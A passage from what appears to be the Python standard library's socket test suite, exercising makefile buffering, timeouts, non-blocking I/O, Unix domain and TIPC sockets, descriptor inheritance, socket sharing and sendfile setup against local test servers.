buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if support.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
# bpo-37553: This is taking longer than 2 seconds on Windows ARM32 buildbot
TIMEOUT = 10 if sys.platform == 'win32' and platform.machine() == 'ARM' else 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(MAIN_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
